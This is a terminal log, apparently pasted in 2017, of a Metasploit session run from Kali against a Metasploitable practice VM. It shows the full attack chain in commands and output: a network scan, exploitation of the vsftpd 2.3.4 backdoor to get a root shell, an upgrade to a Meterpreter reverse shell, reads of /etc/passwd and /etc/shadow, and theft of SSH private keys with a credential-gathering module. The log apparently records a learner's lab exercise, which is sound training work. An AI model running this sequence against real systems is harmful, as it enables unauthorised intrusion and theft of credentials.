
Untitled

a guest
Nov 21st, 2017
  1. root@kali:~# service postgresql start
  2. root@kali:~# sudo msfdb init
  3. Creating database user 'msf'
  4. Enter password for new role:
  5. Enter it again:
  6. Creating databases 'msf' and 'msf_test'
  7. Creating configuration file in /usr/share/metasploit-framework/config/database.yml
  8. Creating initial database schema
  9. root@kali:~# msfconsole
  10.  
  11.  
  12. Metasploit Park, System Security Interface
  13. Version 4.0.5, Alpha E
  14. Ready...
  15. > access security
  16. access: PERMISSION DENIED.
  17. > access security grid
  18. access: PERMISSION DENIED.
  19. > access main security grid
  20. access: PERMISSION DENIED....and...
  21. YOU DIDN'T SAY THE MAGIC WORD!
  22. YOU DIDN'T SAY THE MAGIC WORD!
  23. YOU DIDN'T SAY THE MAGIC WORD!
  24. YOU DIDN'T SAY THE MAGIC WORD!
  25. YOU DIDN'T SAY THE MAGIC WORD!
  26. YOU DIDN'T SAY THE MAGIC WORD!
  27. YOU DIDN'T SAY THE MAGIC WORD!
  28.  
  29.  
  30. =[ metasploit v4.16.6-dev ]
  31. + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
  32. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  33. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  34.  
  35. msf > db_status
  36. [*] postgresql connected to msf
  37. msf > show workspace
  38. [-] Invalid parameter "workspace", use "show -h" for more information
  39. msf > show -h
  40. [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, info, options
  41. [*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
  42. msf > workspace
  43. * default
  44. msf > workspace meta
  45. [-] Workspace not found: meta
  46. msf > workspace -a meta
  47. [*] Added workspace: meta
  48. msf > workspace meta
  49. [*] Workspace: meta
  50. msf > db_nmap
  51. [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
  52. msf > db_nmap --save
  53. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:58 CET
  54. [*] Nmap: 'WARNING: No targets were specified, so 0 hosts scanned.'
  55. [*] Nmap: Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
  56. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1sonodp.xml
  57. msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
  58. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:59 CET
  59. [*] Nmap: Nmap scan report for 10.0.2.1
  60. [*] Nmap: Host is up (-0.20s latency).
  61. [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
  62. [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
  63. [*] Nmap: Nmap scan report for 10.0.2.2
  64. [*] Nmap: Host is up (0.00038s latency).
  65. [*] Nmap: Not shown: 47 closed ports
  66. [*] Nmap: PORT STATE SERVICE
  67. [*] Nmap: 21/tcp open ftp
  68. [*] Nmap: 22/tcp open ssh
  69. [*] Nmap: 23/tcp open telnet
  70. [*] Nmap: 25/tcp open smtp
  71. [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
  72. [*] Nmap: Nmap scan report for 10.0.2.3
  73. [*] Nmap: Host is up (0.000071s latency).
  74. [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
  75. [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.33 seconds
  76. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1t23job.xml
  77. msf > services -S ftp [10.0.2.2]
  78. [-] Invalid host parameter, [10.0.2.2].
  79. msf > services -S ftp 10.0.2.2
  80.  
  81. Services
  82. ========
  83.  
  84. host port proto name state info
  85. ---- ---- ----- ---- ----- ----
  86. 10.0.2.2 21 tcp ftp open
  87.  
  88. msf > use
  89. Usage: use module_name
  90.  
  91. The use command is used to interact with a module of a given name.
  92.  
  93. msf > use exploit
  94. [-] Failed to load module: exploit
  95. msf > use exploit/
  96. Display all 1682 possibilities? (y or n)
  97. msf > use exploit/unix/ftp/
  98. use exploit/unix/ftp/proftpd_133c_backdoor
  99. use exploit/unix/ftp/proftpd_modcopy_exec
  100. use exploit/unix/ftp/vsftpd_234_backdoor
  101. msf > use exploit/unix/ftp/vsftpd_234_backdoor
  102. msf exploit(vsftpd_234_backdoor) > show targets
  103.  
  104. Exploit targets:
  105.  
  106. Id Name
  107. -- ----
  108. 0 Automatic
  109.  
  110.  
  111. msf exploit(vsftpd_234_backdoor) > cd..
  112. [-] Unknown command: cd...
  113. msf exploit(vsftpd_234_backdoor) > exit
  114. root@kali:~# msfconsole
  115.  
  116.  
  132.  
  133.  
  134. =[ metasploit v4.16.6-dev ]
  135. + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
  136. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  137. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  138.  
  139. msf > db_status
  140. [*] postgresql connected to msf
  141. msf > hosts
  142.  
  143. Hosts
  144. =====
  145.  
  146. address mac name os_name os_flavor os_sp purpose info comments
  147. ------- --- ---- ------- --------- ----- ------- ---- --------
  148.  
  149. msf > services -S ftp 10.0.2.2 --save
  150. [-] Invalid host parameter, --save.
  151. msf > db_nmap
  152. [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
  153. msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
  154. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 15:07 CET
  155. [*] Nmap: Nmap scan report for 10.0.2.1
  156. [*] Nmap: Host is up (-0.20s latency).
  157. [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
  158. [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
  159. [*] Nmap: Nmap scan report for 10.0.2.2
  160. [*] Nmap: Host is up (0.00035s latency).
  161. [*] Nmap: Not shown: 47 closed ports
  162. [*] Nmap: PORT STATE SERVICE
  163. [*] Nmap: 21/tcp open ftp
  164. [*] Nmap: 22/tcp open ssh
  165. [*] Nmap: 23/tcp open telnet
  166. [*] Nmap: 25/tcp open smtp
  167. [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
  168. [*] Nmap: Nmap scan report for 10.0.2.3
  169. [*] Nmap: Host is up (0.000084s latency).
  170. [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
  171. [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.47 seconds
  172. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1913-mharu5.xml
  173. msf > hosts
  174.  
  175. Hosts
  176. =====
  177.  
  178. address mac name os_name os_flavor os_sp purpose info comments
  179. ------- --- ---- ------- --------- ----- ------- ---- --------
  180. 10.0.2.2 08:00:27:21:d6:69 Unknown device
  181.  
  182. msf > services
  183.  
  184. Services
  185. ========
  186.  
  187. host port proto name state info
  188. ---- ---- ----- ---- ----- ----
  189. 10.0.2.2 21 tcp ftp open
  190. 10.0.2.2 22 tcp ssh open
  191. 10.0.2.2 23 tcp telnet open
  192. 10.0.2.2 25 tcp smtp open
  193.  
  194. msf > services -S ftp 10.0.2.2
  195.  
  196. Services
  197. ========
  198.  
  199. host port proto name state info
  200. ---- ---- ----- ---- ----- ----
  201. 10.0.2.2 21 tcp ftp open
  202.  
  203. msf > use exploit/unix/ftp/vsftpd_234_backdoor
  204. msf exploit(vsftpd_234_backdoor) > show targets
  205.  
  206. Exploit targets:
  207.  
  208. Id Name
  209. -- ----
  210. 0 Automatic
  211.  
  212.  
  213. msf exploit(vsftpd_234_backdoor) > set rhost
  214. [-] Unknown variable
  215. Usage: set [option] [value]
  216.  
  217. Set the given option to value. If value is omitted, print the current value.
  218. If both are omitted, print options that are currently set.
  219.  
  220. If run from a module context, this will set the value in the module's
  221. datastore. Use -g to operate on the global datastore
  222.  
  223. msf exploit(vsftpd_234_backdoor) > set rhost 10.0.2.2
  224. rhost => 10.0.2.2
  225. msf exploit(vsftpd_234_backdoor) > options
  226.  
  227. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  228.  
  229. Name Current Setting Required Description
  230. ---- --------------- -------- -----------
  231. RHOST 10.0.2.2 yes The target address
  232. RPORT 21 yes The target port (TCP)
  233.  
  234.  
  235. Exploit target:
  236.  
  237. Id Name
  238. -- ----
  239. 0 Automatic
  240.  
  241.  
  242. msf exploit(vsftpd_234_backdoor) > check
  243. [*] 10.0.2.2:21 This module does not support check.
  244. msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/
  245. info exploit/unix/ftp/proftpd_133c_backdoor
  246. info exploit/unix/ftp/proftpd_modcopy_exec
  247. info exploit/unix/ftp/vsftpd_234_backdoor
  248. msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor
  249.  
  250. Name: VSFTPD v2.3.4 Backdoor Command Execution
  251. Module: exploit/unix/ftp/vsftpd_234_backdoor
  252. Platform: Unix
  253. Privileged: Yes
  254. License: Metasploit Framework License (BSD)
  255. Rank: Excellent
  256. Disclosed: 2011-07-03
  257.  
  258. Provided by:
  259. hdm <x@hdm.io>
  260. MC <mc@metasploit.com>
  261.  
  262. Available targets:
  263. Id Name
  264. -- ----
  265. 0 Automatic
  266.  
  267. Basic options:
  268. Name Current Setting Required Description
  269. ---- --------------- -------- -----------
  270. RHOST yes The target address
  271. RPORT 21 yes The target port (TCP)
  272.  
  273. Payload information:
  274. Space: 2000
  275. Avoid: 0 characters
  276.  
  277. Description:
  278. This module exploits a malicious backdoor that was added to the
  279. VSFTPD download archive. This backdoor was introduced into the
  280. vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
  281. according to the most recent information available. This backdoor
  282. was removed on July 3rd 2011.
  283.  
  284. References:
  285. OSVDB (73573)
  286. http://pastebin.com/AetT9sS5
  287. http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
  288.  
  289. msf exploit(vsftpd_234_backdoor) > show payloads
  290.  
  291. Compatible Payloads
  292. ===================
  293.  
  294. Name Disclosure Date Rank Description
  295. ---- --------------- ---- -----------
  296. cmd/unix/interact normal Unix Command, Interact with Established Connection
  297.  
  298. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
  299. payload => cmd/unix/interact
  300. msf exploit(vsftpd_234_backdoor) > show options
  301.  
  302. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  303.  
  304. Name Current Setting Required Description
  305. ---- --------------- -------- -----------
  306. RHOST 10.0.2.2 yes The target address
  307. RPORT 21 yes The target port (TCP)
  308.  
  309.  
  310. Payload options (cmd/unix/interact):
  311.  
  312. Name Current Setting Required Description
  313. ---- --------------- -------- -----------
  314.  
  315.  
  316. Exploit target:
  317.  
  318. Id Name
  319. -- ----
  320. 0 Automatic
  321.  
  322.  
  323. msf exploit(vsftpd_234_backdoor) > exploit
  324.  
  325. [*] 10.0.2.2:21 - Banner: 220 (vsFTPd 2.3.4)
  326. [*] 10.0.2.2:21 - USER: 331 Please specify the password.
  327. [+] 10.0.2.2:21 - Backdoor service has been spawned, handling...
  328. [+] 10.0.2.2:21 - UID: uid=0(root) gid=0(root)
  329. [*] Found shell.
  330. [*] Command shell session 1 opened (10.0.2.3:42357 -> 10.0.2.2:6200) at 2017-11-21 15:18:50 +0100
  331.  
  332. uname -a
  333. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  334. ^Z
  335. Background session 1? [y/N] y
  336. msf exploit(vsftpd_234_backdoor) > sessions
  337.  
  338. Active sessions
  339. ===============
  340.  
  341. Id Type Information Connection
  342. -- ---- ----------- ----------
  343. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  344.  
  345. msf exploit(vsftpd_234_backdoor) > post/multi/manage/shell_to_meterpreter
  346. [-] Unknown command: post/multi/manage/shell_to_meterpreter.
  347. msf exploit(vsftpd_234_backdoor) > postexploitation post/multi/manage/shell_to_meterpreter
  348. [-] Unknown command: postexploitation.
  349. msf exploit(vsftpd_234_backdoor) > run post/multi/manage/shell_to_meterpreter
  350. [*] 10.0.2.2:21 - The port used by the backdoor bind listener is already open
  351. [-] 10.0.2.2:21 - The service on port 6200 does not appear to be a shell
  352. [*] Exploit completed, but no session was created.
  353. msf exploit(vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter
       msf post(shell_to_meterpreter) > show options
  354.  
  355. Module options (post/multi/manage/shell_to_meterpreter):
  356.  
  357. Name Current Setting Required Description
  358. ---- --------------- -------- -----------
  359. HANDLER true yes Start an exploit/multi/handler to receive the connection
  360. LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
  361. LPORT 4433 yes Port for payload to connect to.
  362. SESSION yes The session to run this module on.
  363.  
  364. msf post(shell_to_meterpreter) > sessions
  365.  
  366. Active sessions
  367. ===============
  368.  
  369. Id Type Information Connection
  370. -- ---- ----------- ----------
  371. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  372.  
  373. msf post(shell_to_meterpreter) > set session 1
  374. session => 1
  375. msf post(shell_to_meterpreter) > show options
  376.  
  377. Module options (post/multi/manage/shell_to_meterpreter):
  378.  
  379. Name Current Setting Required Description
  380. ---- --------------- -------- -----------
  381. HANDLER true yes Start an exploit/multi/handler to receive the connection
  382. LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
  383. LPORT 4433 yes Port for payload to connect to.
  384. SESSION 1 yes The session to run this module on.
  385.  
  386. msf post(shell_to_meterpreter) > run postexploitation
  387.  
  388. [*] Upgrading session ID: 1
  389. [*] Starting exploit/multi/handler
  390. [*] Started reverse TCP handler on 10.0.2.3:4433
  391. [*] Sending stage (826872 bytes) to 10.0.2.2
  392. [*] Meterpreter session 2 opened (10.0.2.3:4433 -> 10.0.2.2:46390) at 2017-11-21 15:29:00 +0100
  393. [*] Command stager progress: 100.00% (736/736 bytes)
  394. [*] Post module execution completed
  395. msf post(shell_to_meterpreter) > sessions
  396.  
  397. Active sessions
  398. ===============
  399.  
  400. Id Type Information Connection
  401. -- ---- ----------- ----------
  402. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  403. 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain 10.0.2.3:4433 -> 10.0.2.2:46390 (10.0.2.2)
  404.  
  405. msf post(shell_to_meterpreter) > sessions -i 2
  406. [*] Starting interaction with 2...
  407.  
  408. meterpreter > sysinfo
  409. Computer : metasploitable.localdomain
  410. OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
  411. Architecture : i686
  412. Meterpreter : x86/linux
  413. meterpreter > cat /etc/passwd
  414. root:x:0:0:root:/root:/bin/bash
  415. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  416. bin:x:2:2:bin:/bin:/bin/sh
  417. sys:x:3:3:sys:/dev:/bin/sh
  418. sync:x:4:65534:sync:/bin:/bin/sync
  419. games:x:5:60:games:/usr/games:/bin/sh
  420. man:x:6:12:man:/var/cache/man:/bin/sh
  421. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  422. mail:x:8:8:mail:/var/mail:/bin/sh
  423. news:x:9:9:news:/var/spool/news:/bin/sh
  424. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  425. proxy:x:13:13:proxy:/bin:/bin/sh
  426. www-data:x:33:33:www-data:/var/www:/bin/sh
  427. backup:x:34:34:backup:/var/backups:/bin/sh
  428. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  429. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  430. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  431. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  432. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  433. dhcp:x:101:102::/nonexistent:/bin/false
  434. syslog:x:102:103::/home/syslog:/bin/false
  435. klog:x:103:104::/home/klog:/bin/false
  436. sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  437. msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
  438. bind:x:105:113::/var/cache/bind:/bin/false
  439. postfix:x:106:115::/var/spool/postfix:/bin/false
  440. ftp:x:107:65534::/home/ftp:/bin/false
  441. postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  442. mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
  443. tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
  444. distccd:x:111:65534::/:/bin/false
  445. user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
  446. service:x:1002:1002:,,,:/home/service:/bin/bash
  447. telnetd:x:112:120::/nonexistent:/bin/false
  448. proftpd:x:113:65534::/var/run/proftpd:/bin/false
  449. statd:x:114:65534::/var/lib/nfs:/bin/false
  487. meterpreter > cat /etc/shadow
  524. meterpreter >
  525. Background session 2? [y/N]
  526. msf post(shell_to_meterpreter) > use post/multi/gather/ssh_creds
  527. msf post(ssh_creds) > options
  528.  
  529. Module options (post/multi/gather/ssh_creds):
  530.  
  531. Name Current Setting Required Description
  532. ---- --------------- -------- -----------
  533. SESSION yes The session to run this module on.
  534.  
  535. msf post(ssh_creds) > session 1
  536. [-] Unknown command: session.
  537. msf post(ssh_creds) > set session 1
  538. session => 1
  539. msf post(ssh_creds) > session 1
  540. [-] Unknown command: session.
  541. msf post(ssh_creds) > set session 1
  542. session => 1
  543. msf post(ssh_creds) > options
  544.  
  545. Module options (post/multi/gather/ssh_creds):
  546.  
  547. Name Current Setting Required Description
  548. ---- --------------- -------- -----------
  549. SESSION 1 yes The session to run this module on.
  550.  
  551. msf post(ssh_creds) > run postexploitation
  552.  
  553. [*] Finding .ssh directories
  554. [*] Looting 3 directories
  555. [+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20171121153305_default_10.0.2.2_ssh.authorized_k_467319.txt
  556. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  557. [+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa_189943.txt
  558. [+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa.pub_614578.txt
  559. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  560. [+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa_183298.txt
  561. [+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa.pub_979685.txt
  562. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  563. [+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.authorized_k_630265.txt
  564. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  565. [+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.known_hosts_814874.txt
  566. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  567. [*] Post module execution completed
  568. msf post(ssh_creds) > creds
  569. Credentials
  570. ===========
  571.  
  572. host origin service public private realm private_type
  573. ---- ------ ------- ------ ------- ----- ------------
  574. msfadmin 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a SSH key
  575. user 70:ff:0f:ff:a3:8e:39:18:d7:30:c1:30:02:bc:20:3c SSH key
  576.  
  577. msf post(ssh_creds) > exit
  578. [*] You have active sessions open, to exit anyway type "exit -y"
  579. msf post(ssh_creds) > session -k 1
  580. [-] Unknown command: session.
  581. msf post(ssh_creds) > sessions -k 1
  582. [*] Killing the following session(s): 1
  583. [*] Killing session 1
  584. [*] 10.0.2.2 - Command shell session 1 closed.
  585. msf post(ssh_creds) > sessions -k 2
  586. [*] Killing the following session(s): 2
  587. [*] Killing session 2
  588. [*] 10.0.2.2 - Meterpreter session 2 closed.
  589. msf post(ssh_creds) > exit